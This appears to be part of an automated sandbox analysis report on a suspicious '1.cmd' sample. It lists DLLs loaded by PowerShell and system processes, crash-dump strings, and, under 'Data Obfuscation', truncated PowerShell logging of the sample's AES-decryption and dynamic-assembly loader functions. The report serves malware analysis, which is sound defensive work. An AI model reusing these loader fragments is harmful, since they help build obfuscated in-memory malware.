Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dbghelp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dbgcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: faultrep.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dbghelp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dbgcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dbghelp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: textshaping.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: textinputframework.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: coreuicomponents.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: coremessaging.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskschd.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sxs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntdsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: logoncli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: xmllite.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pdh.dll
Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskschd.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskschd.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskschd.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: xmllite.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskschd.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\dllhost.exeSection loaded: ntmarta.dll
Source: C:\Windows\System32\dllhost.exeSection loaded: pdh.dll
Source: C:\Windows\System32\winlogon.exeSection loaded: pdh.dll
Source: C:\Windows\System32\winlogon.exeSection loaded: amsi.dll
Source: C:\Windows\System32\lsass.exeSection loaded: pdh.dll
Source: C:\Windows\System32\lsass.exeSection loaded: amsi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dll
Source: C:\Windows\System32\dwm.exeSection loaded: pdh.dll
Source: C:\Windows\System32\dwm.exeSection loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIADAP.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIADAP.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIADAP.exeSection loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIADAP.exeSection loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIADAP.exeSection loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIADAP.exeSection loaded: loadperf.dll
Source: C:\Windows\System32\wbem\WMIADAP.exeSection loaded: pdh.dll
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32Jump to behavior
Source: C:\Windows\System32\wbem\WMIADAP.exeFile written: C:\Windows\System32\wbem\Performance\WmiApRpl_new.ini
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: 1.cmdStatic file information: File size 5214429 > 1048576
Source: Binary string: System.Configuration.Install.pdb source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: System.Data.pdb source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: System.Core.pdbSystem.Transactions.ni.dlliy source: WER643A.tmp.dmp.27.dr
Source: Binary string: System.pdbMZ@ source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: System.Numerics.pdbp source: WER8767.tmp.dmp.10.dr
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 00000030.00000002.2993093539.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: System.Xml.pdbp source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: System.Windows.Forms.ni.pdb source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: System.Drawing.ni.pdb source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: mscorlib.ni.pdbRSDS7^3l source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: Microsoft.Powershell.PSReadline.pdb source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: System.DirectoryServices.ni.pdbRSDS source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\wct3D66.tmp.pdb source: svchost.exe, 00000030.00000002.2998382986.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000030.00000000.2531371403.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: System.Drawing.ni.pdbRSDS source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 00000030.00000002.2993093539.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000030.00000000.2531084771.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: "@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: svchost.exe, 00000030.00000002.2998382986.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000030.00000000.2531371403.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: System.Configuration.Install.ni.pdbRSDSQ source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: System.Xml.ni.pdbRSDS# source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: Microsoft.PowerShell.Security.pdbP source: WER643A.tmp.dmp.27.dr
Source: Binary string: System.Core.ni.pdb source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: .@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: svchost.exe, 00000030.00000002.2998382986.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000030.00000000.2531371403.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: System.Numerics.ni.pdb source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: (@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 00000030.00000002.2993093539.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000030.00000000.2531084771.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: System.DirectoryServices.ni.pdb source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: System.Drawing.pdb0 source: WER8767.tmp.dmp.10.dr
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: svchost.exe, 00000030.00000002.2995887464.000001ADEC04C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000030.00000000.2531273543.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: System.ServiceProcess.pdb source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: System.Management.ni.pdbRSDSJ< source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: System.Configuration.Install.pdb }b source: WER8767.tmp.dmp.10.dr
Source: Binary string: Microsoft.PowerShell.ConsoleHost.ni.pdbRSDS[q source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: System.Windows.Forms.ni.pdbRSDS source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: mscorlib.ni.pdb source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: "@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: svchost.exe, 00000030.00000002.2998382986.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000030.00000000.2531371403.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: WINLOA~1.PDB source: svchost.exe, 00000030.00000002.2995887464.000001ADEC04C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000030.00000000.2531273543.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: System.ServiceProcess.ni.pdb source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: System.Configuration.Install.ni.pdb source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: mscorlib.pdb:\W source: WER8767.tmp.dmp.10.dr
Source: Binary string: Microsoft.Management.Infrastructure.ni.pdbRSDS source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: *@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: svchost.exe, 00000030.00000002.2998382986.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000030.00000000.2531371403.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.ni.pdbRSDS source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 00000030.00000002.2998382986.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000030.00000000.2531371403.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: .@\??\C:\Users\user\AppData\Local\Temp\wctAB5F.tmp.pdb source: svchost.exe, 00000030.00000002.2995887464.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000030.00000000.2531273543.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Security.ni.pdb source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: System.Xml.ni.pdb source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: Microsoft.PowerShell.Security.pdb source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: System.ni.pdbRSDS source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: System.DirectoryServices.pdb source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: Microsoft.CSharp.pdb source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: System.Management.pdbP4 source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: System.Configuration.ni.pdb source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: System.Configuration.pdb source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: System.Data.ni.pdb source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: System.Data.ni.pdbRSDSC source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: System.Windows.Forms.pdb` source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: System.Xml.pdb source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: Microsoft.PowerShell.ConsoleHost.pdb source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: System.pdb source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 00000030.00000002.2993093539.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000030.00000000.2531084771.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: ,@\??\C:\Users\user\AppData\Local\Temp\wmsetup.log.pdb source: svchost.exe, 00000030.00000002.2995887464.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000030.00000000.2531273543.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.ni.pdb source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: System.Numerics.ni.pdbRSDSautg source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: System.Management.Automation.ni.pdbRSDS source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: System.Data.pdbH source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: System.ServiceProcess.ni.pdbRSDSwg source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: System.Windows.Forms.pdb source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: System.Management.Automation.pdb source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: svchost.exe, 00000030.00000002.2995887464.000001ADEC04C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000030.00000000.2531273543.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdb source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: Microsoft.PowerShell.Commands.Utility.ni.pdb source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: Microsoft.PowerShell.Security.ni.pdbRSDS~ source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: System.Management.Automation.pdb3 source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: System.Management.pdb source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: System.Drawing.pdb source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2.pdbr source: svchost.exe, 00000030.00000002.2995887464.000001ADEC04C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000030.00000000.2531273543.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: Microsoft.Management.Infrastructure.pdb source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: System.Management.ni.pdb source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: System.Core.pdb source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: System.Transactions.pdb source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: System.Configuration.Install.pdbh source: WER643A.tmp.dmp.27.dr
Source: Binary string: System.Core.pdbiy source: WER8767.tmp.dmp.10.dr
Source: Binary string: Microsoft.Management.Infrastructure.ni.pdb source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: Microsoft.PowerShell.ConsoleHost.ni.pdb source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdbP source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: System.Transactions.ni.pdb source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 00000030.00000002.2993093539.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000030.00000000.2531084771.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: Microsoft.Powershell.PSReadline.pdb N source: WER643A.tmp.dmp.27.dr
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 00000030.00000002.2995887464.000001ADEC04C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000030.00000000.2531273543.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: *@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb* source: svchost.exe, 00000030.00000002.2998382986.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000030.00000000.2531371403.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: System.Transactions.ni.pdbRSDS source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: System.Numerics.pdb source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: Microsoft.CSharp.pdb@ source: WER643A.tmp.dmp.27.dr
Source: Binary string: System.ni.pdb source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: System.Core.ni.pdbRSDS source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr

Data Obfuscation

barindex
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell logging: function Rgueq($eXEDy){$HKJEc=[System.Security.Cryptography.Aes]::Create();$HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC;$HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell logging: function Rgueq($eXEDy){$HKJEc=[System.Security.Cryptography.Aes]::Create();$HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC;$HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell logging: function Rgueq($eXEDy){$HKJEc=[System.Security.Cryptography.Aes]::Create();$HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC;$HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell logging: function Rgueq($eXEDy){$HKJEc=[System.Security.Cryptography.Aes]::Create();$HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC;$HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell logging: function Local:QuvobnauGMMc{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$uwMlljVVwbVUVD,[Parameter(Position=1)][Type]$qJfzFIqcrY)$WLjbMWfHUpI=[AppDomain]::CurrentDomain.DefineDynamicAssem
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell logging: function Local:QuvobnauGMMc{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$uwMlljVVwbVUVD,[Parameter(Position=1)][Type]$qJfzFIqcrY)$WLjbMWfHUpI=[AppDomain]::CurrentDomain.DefineDynamicAssem
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell logging: function Local:QuvobnauGMMc{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$uwMlljVVwbVUVD,[Parameter(Position=1)][Type]$qJfzFIqcrY)$WLjbMWfHUpI=[AppDomain]::CurrentDomain.DefineDynamicAssem
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell logging: function Local:QuvobnauGMMc{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$uwMlljVVwbVUVD,[Parameter(Position=1)][Type]$qJfzFIqcrY)$WLjbMWfHUpI=[AppDomain]::CurrentDomain.DefineDynamicAssem
